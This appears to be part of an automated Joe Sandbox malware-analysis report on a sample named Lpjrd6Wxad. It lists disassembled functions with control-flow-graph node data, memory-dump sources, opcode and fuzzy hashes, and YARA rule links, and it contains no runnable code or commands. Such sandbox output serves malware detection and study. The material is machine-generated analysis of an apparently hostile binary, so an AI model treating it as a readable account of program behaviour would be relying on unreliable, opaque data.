                                                                                                                                              control_flow_graph 3869 102c147-102c158 3870 102c184 3869->3870 3871 102c15a-102c15e 3869->3871 3873 102c186-102c18a 3870->3873 3872 102c15f-102c160 3871->3872 3874 102c163-102c166 3872->3874 3876 102c167-102c172 3874->3876 3878 102c174-102c179 3876->3878 3879 102c17b-102c17e 3876->3879 3878->3873 3880 102c180-102c182 3879->3880 3881 102c18b-102c199 3879->3881 3880->3870 3880->3871 3881->3872 3883 102c19b-102c19d 3881->3883 3883->3874 3884 102c19f-102c1a1 3883->3884 3884->3876 3885 102c1a3-102c1c8 3884->3885 3886 102c1ca 3885->3886 3887 102c1cf-102c2ac call 10241a0 call 1023cc0 3885->3887 3886->3887 3897 102c2b3-102c2d4 call 1025658 3887->3897 3898 102c2ae 3887->3898 3900 102c2d9-102c2e4 3897->3900 3898->3897 3901 102c2e6 3900->3901 3902 102c2eb-102c2ef 3900->3902 3901->3902 3903 102c2f1-102c2f2 3902->3903 3904 102c2f4-102c2fb 3902->3904 3905 102c313-102c357 3903->3905 3906 102c302-102c310 3904->3906 3907 102c2fd 3904->3907 3911 102c3bd-102c3d4 3905->3911 3906->3905 3907->3906 3913 102c3d6-102c3fb 3911->3913 3914 102c359-102c36f 3911->3914 3921 102c413 3913->3921 3922 102c3fd-102c412 3913->3922 3918 102c371-102c37d 3914->3918 3919 102c399 3914->3919 3923 102c387-102c38d 3918->3923 3924 102c37f-102c385 3918->3924 3920 102c39f-102c3bc 3919->3920 3920->3911 3922->3921 3925 102c397 3923->3925 3924->3925 3925->3920
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 79bf516f9a4e9ce09b8dc792e18eee37f73338fd5e90e78db6d93379d09d3dc6
                                                                                                                                              • Instruction ID: e9fd5d00c3293dd2568bc38ec3adc66d1e485130fc9f8b741d04ea6bbda1d1f2
                                                                                                                                              • Opcode Fuzzy Hash: 79bf516f9a4e9ce09b8dc792e18eee37f73338fd5e90e78db6d93379d09d3dc6
                                                                                                                                              • Instruction Fuzzy Hash: 10A1F774E00258CFEB54DFA9D984A9DBBF2BF89300F1480AAE449EB365DB319945CF50
                                                                                                                                              Function 0102CD28 Relevance: .2, Instructions: 187COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af7fcde227234e75220993863e8becff9656ae6b14da8cb4720565e7f3d7bcf2
                                                                                                                                              • Instruction ID: 37c682d6315234bdefe21eba969091c4f9003ab09176719fa8dea2d62708f967
                                                                                                                                              • Opcode Fuzzy Hash: af7fcde227234e75220993863e8becff9656ae6b14da8cb4720565e7f3d7bcf2
                                                                                                                                              • Instruction Fuzzy Hash: BC81B474E00218CFEB54DFA9D984A9DFBF2BF88300F148069E859AB365DB345945CF51
                                                                                                                                              Function 0102D2C8 Relevance: .2, Instructions: 186COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ca868a163d6185e326f7f75229988d162442c1238d22b29bc8e96ba19632c942
                                                                                                                                              • Instruction ID: 0d30a5cf9267a4c61db6e4c9494f4998f33cbd05462941a353d31d53fcf427ca
                                                                                                                                              • Opcode Fuzzy Hash: ca868a163d6185e326f7f75229988d162442c1238d22b29bc8e96ba19632c942
                                                                                                                                              • Instruction Fuzzy Hash: 3381B374E00218CFEB54DFAAD884B9DBBF2BF89300F148069E849AB365DB349945CF11
                                                                                                                                              Function 0102D599 Relevance: .2, Instructions: 185COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d8875857ac895e8e7585f9154f9fde62908b1460e2502e1ea84655303f791062
                                                                                                                                              • Instruction ID: bd2fb6cec257ff0e6e6864cefda91a77e816d45ea74b2a05ae28a3035614d3d7
                                                                                                                                              • Opcode Fuzzy Hash: d8875857ac895e8e7585f9154f9fde62908b1460e2502e1ea84655303f791062
                                                                                                                                              • Instruction Fuzzy Hash: DB81B574E01258CFEB54DFAAD984A9DBBF2BF88300F1480A9E449AB365DB349D45CF11
                                                                                                                                              Function 0102C738 Relevance: .2, Instructions: 185COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 942e320714a808e37c4fb2b4cfd0f13f5277bfbd2ea537026517ea8c9fadbdd2
                                                                                                                                              • Instruction ID: bef1d77c51c999fab8e0983df09f01c6e62595195f78c3305c977336053dcb8b
                                                                                                                                              • Opcode Fuzzy Hash: 942e320714a808e37c4fb2b4cfd0f13f5277bfbd2ea537026517ea8c9fadbdd2
                                                                                                                                              • Instruction Fuzzy Hash: 0681A3B4E00218CFEB54DFAAD984A9DBBF2BF88300F14C069E859AB365DB745941CF51
                                                                                                                                              Function 0102CFF7 Relevance: .2, Instructions: 185COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b12d6a849b8a5d1d5e236cec070c3a8b34f6b866954bb2d6152fb691f66a7dba
                                                                                                                                              • Instruction ID: cc6dd645f5e046aca98fa000b251f67bf479c88e7fed402f86d3e46a61699ce0
                                                                                                                                              • Opcode Fuzzy Hash: b12d6a849b8a5d1d5e236cec070c3a8b34f6b866954bb2d6152fb691f66a7dba
                                                                                                                                              • Instruction Fuzzy Hash: 5281B474E00218DFEB54DFA9D984B9DBBF2BF88310F248069E849AB365DB349945CF50
                                                                                                                                              Function 0102C46F Relevance: .2, Instructions: 183COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4d3d257899bdf1daf4321877dfb496cf7175c6b0553e2ba4ec44157c2e0256c0
                                                                                                                                              • Instruction ID: 8bcc99d1406881d66a9093f41326da7743a5220aeaaae22a7f5ba77e2970d7c1
                                                                                                                                              • Opcode Fuzzy Hash: 4d3d257899bdf1daf4321877dfb496cf7175c6b0553e2ba4ec44157c2e0256c0
                                                                                                                                              • Instruction Fuzzy Hash: BA81C774E00218CFEB54DFA9D944A9DBBF2BF88300F14D16AE459AB365DB349945CF10
                                                                                                                                              Function 01025370 Relevance: .2, Instructions: 153COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 22fd45bf8acb877d5f6ff85a8a7ea651fdb12b3c7ee003f869c27238d2e85839
                                                                                                                                              • Instruction ID: 9f9a3c44ba03bd709d2655766f473f3494bc72b52f5db3dbdd3ddd8c612382a9
                                                                                                                                              • Opcode Fuzzy Hash: 22fd45bf8acb877d5f6ff85a8a7ea651fdb12b3c7ee003f869c27238d2e85839
                                                                                                                                              • Instruction Fuzzy Hash: EC61C374E012189FDB14DFAAD954ADDBBF2BF88300F14806AE848AB365DB349946CF00
                                                                                                                                              Function 0102EC0A Relevance: .1, Instructions: 147COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 64c57946df1dc9467faf2efcf216b4ce9297f897ab2a2e9f975bb1e37454e722
                                                                                                                                              • Instruction ID: 9113b61eb60b75fd85e79ef5d5bb88cfc537edc191bf96132876c43c08be27cc
                                                                                                                                              • Opcode Fuzzy Hash: 64c57946df1dc9467faf2efcf216b4ce9297f897ab2a2e9f975bb1e37454e722
                                                                                                                                              • Instruction Fuzzy Hash: 4351A674E00218DFDB18DFAAD894A9DFBB2FF88300F248169E819AB364DB305845DF11
                                                                                                                                              Function 0102EC18 Relevance: .1, Instructions: 147COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 940a4db03fb436d19b2f3aa78a7a1da2f6027b4f462742cfba4a386070c70cd3
                                                                                                                                              • Instruction ID: f1480b178f58b1d4817c06b6231c0dbd0a9d95a895dcef2a80fe3ad3a5737d7d
                                                                                                                                              • Opcode Fuzzy Hash: 940a4db03fb436d19b2f3aa78a7a1da2f6027b4f462742cfba4a386070c70cd3
                                                                                                                                              • Instruction Fuzzy Hash: E1519574E00218DFDB18DFAAD894A9DBBF2BF89300F248069E819AB364DB305841DF11
                                                                                                                                              Function 058290AC Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1108 58290ac 1109 582916b-582917c 1108->1109 1110 5829183-582918c 1109->1110 1111 582917e 1109->1111 1113 5829192-58291a5 1110->1113 1114 5828f63-5828f88 1110->1114 1111->1110 1117 58291a7 1113->1117 1118 58291ac-58291c7 1113->1118 1115 5828f8a 1114->1115 1116 5828f8f-5828fc6 1114->1116 1115->1116 1127 5828fc8 1116->1127 1128 5828fcd-5828fff 1116->1128 1117->1118 1119 58291c9 1118->1119 1120 58291ce-58291e2 1118->1120 1119->1120 1123 58291e4 1120->1123 1124 58291e9-58291ff LdrInitializeThunk 1120->1124 1123->1124 1126 5829201-58292fe 1124->1126 1131 5829300-5829305 1126->1131 1132 5829306-5829310 1126->1132 1127->1128 1133 5829063-5829076 1128->1133 1134 5829001-5829026 1128->1134 1131->1132 1137 5829078 1133->1137 1138 582907d-58290a2 1133->1138 1135 5829028 1134->1135 1136 582902d-582905b 1134->1136 1135->1136 1136->1133 1137->1138 1142 58290b1-58290e9 1138->1142 1143 58290a4-58290a5 1138->1143 1144 58290f0-5829151 call 5828aa8 1142->1144 1145 58290eb 1142->1145 1143->1113 1151 5829153 1144->1151 1152 5829158-582916a 1144->1152 1145->1144 1151->1152 1152->1109
                                                                                                                                              APIs
                                                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 058291EE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 0edfeece0afd312f85c9fbe7aec997e9c42d94f92dc20061b7262158616994db
                                                                                                                                              • Instruction ID: 5761e3c23202df6ddf0bd58ecaa6d7b276f0fde293a3b340ddd0dfcf648457f8
                                                                                                                                              • Opcode Fuzzy Hash: 0edfeece0afd312f85c9fbe7aec997e9c42d94f92dc20061b7262158616994db
                                                                                                                                              • Instruction Fuzzy Hash: BE115974E042299FEB04DBAAD488AADBBF5FB88304F148165E858E7246D735AD81CB50
                                                                                                                                              Function 0102E287 Relevance: .7, Instructions: 657COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1579 102e287-102e2b2 1580 102e2b4 1579->1580 1581 102e2b9-102e2ba call 102eb79 1579->1581 1580->1581 1582 102e2c0-102e2dc 1581->1582 1587 102e2e3 1582->1587 1588 102e2ea-102e329 1587->1588 1598 102e330-102e361 call 102f281 1588->1598 1606 102e368-102e376 1598->1606 1609 102e37d-102e384 1606->1609 1611 102e38b-102e392 1609->1611 1613 102e399 1611->1613 1614 102e3a0 1613->1614 1615 102e3a7-102e3ae 1614->1615 1617 102e3b5-102e3bc 1615->1617 1619 102e3c3-102e3ca 1617->1619 1621 102e3d1-102e3d8 1619->1621 1623 102e3df 1621->1623 1624 102e3e6 1623->1624 1625 102e3ed 1624->1625 1626 102e3f4 1625->1626 1627 102e3fb-102e409 1626->1627 1630 102e410-102e417 1627->1630 1632 102e41e-102e425 1630->1632 1634 102e42c 1632->1634 1635 102e433 1634->1635 1636 102e43a-102e441 1635->1636 1638 102e448-102e44f 1636->1638 1640 102e456 1638->1640 1641 102e45d-102e464 1640->1641 1643 102e46b 1641->1643 1644 102e472 1643->1644 1645 102e479-102e480 1644->1645 1647 102e487 1645->1647 1648 102e48e-102e49c 1647->1648 1651 102e4a3-102e4aa 1648->1651 1653 102e4b1 1651->1653 1654 102e4b8 1653->1654 1655 102e4bf-102e4c6 1654->1655 1657 102e4cd-102e4d4 1655->1657 1659 102e4db-102e4e2 1657->1659 1661 102e4e9-102e4f0 1659->1661 1663 102e4f7 1661->1663 1664 102e4fe 1663->1664 1665 102e505-102e50c 1664->1665 1667 102e513-102e51a 1665->1667 1669 102e521-102e528 1667->1669 1671 102e52f-102e536 1669->1671 1673 102e53d-102e544 1671->1673 1675 102e54b 1673->1675 1676 102e552 1675->1676 1677 102e559-102e560 1676->1677 1679 102e567 1677->1679 1680 102e56e-102e57c 1679->1680 1683 102e583 1680->1683 1684 102e58a 1683->1684 1685 102e591 1684->1685 1686 102e598 1685->1686 1687 102e59f 1686->1687 1688 102e5a6 1687->1688 1689 102e5ad 1688->1689 1690 102e5b4-102e5c2 1689->1690 1693 102e5c9 1690->1693 1694 102e5d0-102e5de 1693->1694 1697 102e5e5 1694->1697 1698 102e5ec 1697->1698 1699 102e5f3 1698->1699 1700 102e5fa-102e601 1699->1700 1702 102e608-102e60f 1700->1702 1704 102e616 1702->1704 1705 102e61d-102e62b 1704->1705 1708 102e632-102e647 1705->1708 1712 102e64e-102e655 1708->1712 1714 102e65c-102e663 1712->1714 1716 102e66a-102e671 1714->1716 1718 102e678-102e686 1716->1718 1721 102e68d-102e694 1718->1721 1723 102e69b 1721->1723 1724 102e6a2-102e6a9 1723->1724 1726 102e6b0 1724->1726 1727 102e6b7-102e789 1726->1727 1758 102e790-102e79e 1727->1758 1761 102e7a5-102e7c8 1758->1761 1767 102e7cf 1761->1767 1768 102e7d6-102e89a 1767->1768 1797 102e8a1-102e8a8 1768->1797 1799 102e8af-102e8bd 1797->1799 1802 102e8c4 1799->1802 1803 102e8cb 1802->1803 1804 102e8d2 1803->1804 1805 102e8d9-102e965 1804->1805 1826 102e96c 1805->1826 1827 102e973-102e9ab 1826->1827 1836 102e9b2-102e9b9 1827->1836 1838 102e9c0-102e9ce 1836->1838 1841 102e9d5 1838->1841 1842 102e9dc-102e9e3 1841->1842 1844 102e9ea 1842->1844 1845 102e9f1-102eabc 1844->1845 1875 102eac3 1845->1875 1876 102eaca-102ead8 1875->1876 1879 102eadf 1876->1879 1880 102eae6 1879->1880 1881 102eaed-102eafb 1880->1881 1884 102eb02-102eb09 1881->1884 1886 102eb10-102eb3a 1884->1886 1893 102eb41-102eb5d 1886->1893 1898 102eb64-102eb6b 1893->1898 1900 102eb72-102eb75 1898->1900
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ae6fa61f95fa6922092c017fb0c04223eb2073bc53d813fc0a88803b7308bb56
                                                                                                                                              • Instruction ID: a2e62a86ec91894bde57be6afcc81e2ad277fff8c865a8403ad85bb6d55dbbe1
                                                                                                                                              • Opcode Fuzzy Hash: ae6fa61f95fa6922092c017fb0c04223eb2073bc53d813fc0a88803b7308bb56
                                                                                                                                              • Instruction Fuzzy Hash: B112CD348B135A8FD2216F64E6AC26A7B74FF1F7237466E19E10AA0451DF70206DCB61
                                                                                                                                              Function 0102E2A8 Relevance: .6, Instructions: 647COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1903 102e2a8-102e2b2 1904 102e2b4 1903->1904 1905 102e2b9-102eb6b call 102eb79 call 102f281 1903->1905 1904->1905 2224 102eb72-102eb75 1905->2224
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9b397d540348432c0a656748569477a8669ef15c48161a85385b9e98537f2cb0
                                                                                                                                              • Instruction ID: d69f41cd311f6c1a17613c6b06cc841f368027c22c7b6b94bfe70185b6c126a2
                                                                                                                                              • Opcode Fuzzy Hash: 9b397d540348432c0a656748569477a8669ef15c48161a85385b9e98537f2cb0
                                                                                                                                              • Instruction Fuzzy Hash: 8E12BC348B135A8FE2607F24E6AC26A7B74FF1F7237466E15E10BA0805DF70206CCA65
                                                                                                                                              Function 01028490 Relevance: .6, Instructions: 593COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2227 1028490-102871d 2266 1028727-102897e 2227->2266 2302 1028ed0-1028ef3 2266->2302 2303 1028984-1028994 2266->2303 2303->2302 2304 102899a-10289aa 2303->2304 2304->2302 2306 10289b0-10289c0 2304->2306 2306->2302 2307 10289c6-10289d6 2306->2307 2307->2302 2308 10289dc-10289ec 2307->2308 2308->2302 2309 10289f2-1028a02 2308->2309 2309->2302 2310 1028a08-1028a18 2309->2310 2310->2302 2311 1028a1e-1028a2e 2310->2311 2311->2302 2312 1028a34-1028a44 2311->2312 2312->2302 2313 1028a4a-1028a5a 2312->2313 2313->2302 2314 1028a60-1028ecf 2313->2314
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6ae10f553d6e6c5ab04bdb0d06175c91143d1ebb70bb5d2a1aa3717e91e939b7
                                                                                                                                              • Instruction ID: 1c47097e9f35450cc6cf43f109ff8f64a60f4bd02eef663f69466afd3f7e6f06
                                                                                                                                              • Opcode Fuzzy Hash: 6ae10f553d6e6c5ab04bdb0d06175c91143d1ebb70bb5d2a1aa3717e91e939b7
                                                                                                                                              • Instruction Fuzzy Hash: 8042BE74A0021C8FEB14EBE4C860B9EBB77EF88700F1081A9D14A6B765DF355E85AF51
                                                                                                                                              Function 0102848F Relevance: .6, Instructions: 565COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2379 102848f-102870d 2417 1028717-102871d 2379->2417 2418 1028727-102897e 2417->2418 2454 1028ed0-1028ef3 2418->2454 2455 1028984-1028994 2418->2455 2455->2454 2456 102899a-10289aa 2455->2456 2456->2454 2458 10289b0-10289c0 2456->2458 2458->2454 2459 10289c6-10289d6 2458->2459 2459->2454 2460 10289dc-10289ec 2459->2460 2460->2454 2461 10289f2-1028a02 2460->2461 2461->2454 2462 1028a08-1028a18 2461->2462 2462->2454 2463 1028a1e-1028a2e 2462->2463 2463->2454 2464 1028a34-1028a44 2463->2464 2464->2454 2465 1028a4a-1028a5a 2464->2465 2465->2454 2466 1028a60-1028ecf 2465->2466
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3e06ea679deda0b353dd20b0f4e9a8ffb4ea6b0aee0cab8e2fcc5c1620ad0a7c
                                                                                                                                              • Instruction ID: 023f203a06017f176f209eb9aaa21cf1d2a462a37c02f8d89dee266b9e4d2f68
                                                                                                                                              • Opcode Fuzzy Hash: 3e06ea679deda0b353dd20b0f4e9a8ffb4ea6b0aee0cab8e2fcc5c1620ad0a7c
                                                                                                                                              • Instruction Fuzzy Hash: C142AE74A0021C8FEB14EBE4C860B9EBA77EF88700F1081A9D14A6B765DF355E85AF51
                                                                                                                                              Function 01020C93 Relevance: .5, Instructions: 543COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2531 1020c93-1020cc0 2532 1020cc2 2531->2532 2533 1020cc7-1020cdd call 1020780 2531->2533 2532->2533 2536 1020ce2 2533->2536 2537 1020cee-102104e call 1020780 * 13 2536->2537 2611 1021056-102107d call 10227fb 2537->2611 2719 1021080 call 1023cc0 2611->2719 2720 1021080 call 1023cba 2611->2720 2614 1021086-102108f 2721 1021092 call 10241a0 2614->2721 2722 1021092 call 1024285 2614->2722 2615 1021098-10210c2 2618 10210cb 2615->2618 2725 10210ce call 1025362 2618->2725 2726 10210ce call 1025370 2618->2726 2619 10210d4-10210fe 2622 1021107-102110a call 102c147 2619->2622 2623 1021110-102113a 2622->2623 2626 1021143-1021146 call 102c46f 2623->2626 2627 102114c-1021176 2626->2627 2630 102117f-1021182 call 102c738 2627->2630 2631 1021188-10211b2 2630->2631 2634 10211bb-10211be call 102cd28 2631->2634 2635 10211c4-10211f7 2634->2635 2638 1021203-1021209 call 102cff7 2635->2638 2639 102120f-102124b 2638->2639 2642 1021257-102125d call 102d2c8 2639->2642 2643 1021263-102129f 2642->2643 2646 10212ab-10212b1 call 102d599 2643->2646 2647 10212b7-10213d2 2646->2647 2660 10213de-10213ea 2647->2660 2710 10213f0 call 1025362 2660->2710 2711 10213f0 call 1025370 2660->2711 2661 10213f6-102145c 2666 1021467-1021473 call 102d869 2661->2666 2667 1021479-1021485 2666->2667 2668 1021490-102149c call 102d869 2667->2668 2669 10214a2-10214ae 2668->2669 2670 10214b9-10214c5 call 102d869 2669->2670 2671 10214cb-10214d7 2670->2671 2672 10214e2-10214ee call 102d869 2671->2672 2673 10214f4-1021500 2672->2673 2674 102150b-1021517 call 102d869 2673->2674 2675 102151d-1021529 2674->2675 2676 1021534-1021540 call 102d869 2675->2676 2677 1021546-1021552 2676->2677 2678 102155d-1021569 call 102d869 2677->2678 2679 102156f-102158c 2678->2679 2681 1021597-10215a3 call 102d869 2679->2681 2682 10215a9-10215b5 2681->2682 2683 10215c0-10215cc call 102d869 2682->2683 2684 10215d2-10215de 2683->2684 2685 10215e9-10215f5 call 102d869 2684->2685 2686 10215fb-1021607 2685->2686 2687 1021612-102161e call 102d869 2686->2687 2688 1021624-1021630 2687->2688 2689 102163b-1021647 call 102d869 2688->2689 2690 102164d-1021659 2689->2690 2691 1021664-1021670 call 102d869 2690->2691 2692 1021676-1021682 2691->2692 2693 102168d-1021699 call 102d869 2692->2693 2694 102169f-10216ab 2693->2694 2695 10216b6-10216c2 call 102d869 2694->2695 2696 10216c8-10216d4 2695->2696 2697 10216df-10216eb call 102d869 2696->2697 2698 10216f1-10217aa 2697->2698 2710->2661 2711->2661 2719->2614 2720->2614 2721->2615 2722->2615 2725->2619 2726->2619
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: db9e4b328eec19dc01463064686776525d78e0239e58c9b3ffb0f1063f135683
                                                                                                                                              • Instruction ID: 38a6feb178bb887aa7e35fd7e39924738acb9e061efc52875a6ed739b3c8e525
                                                                                                                                              • Opcode Fuzzy Hash: db9e4b328eec19dc01463064686776525d78e0239e58c9b3ffb0f1063f135683
                                                                                                                                              • Instruction Fuzzy Hash: C052E878901219CFCB54EF64ED94B9DBBB2FB88301F1086A9E409A7368DB305E95CF51
                                                                                                                                              Function 01020CA0 Relevance: .5, Instructions: 539COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2740 1020ca0-1020cc0 2741 1020cc2 2740->2741 2742 1020cc7-102107d call 1020780 * 14 call 10227fb 2740->2742 2741->2742 2928 1021080 call 1023cc0 2742->2928 2929 1021080 call 1023cba 2742->2929 2823 1021086-102108f 2930 1021092 call 10241a0 2823->2930 2931 1021092 call 1024285 2823->2931 2824 1021098-10210cb 2934 10210ce call 1025362 2824->2934 2935 10210ce call 1025370 2824->2935 2828 10210d4-10213ea call 102c147 call 102c46f call 102c738 call 102cd28 call 102cff7 call 102d2c8 call 102d599 2919 10213f0 call 1025362 2828->2919 2920 10213f0 call 1025370 2828->2920 2870 10213f6-10216eb call 102d869 * 16 2907 10216f1-10217aa 2870->2907 2919->2870 2920->2870 2928->2823 2929->2823 2930->2824 2931->2824 2934->2828 2935->2828
                                                                                                                                              Memory Dump Source
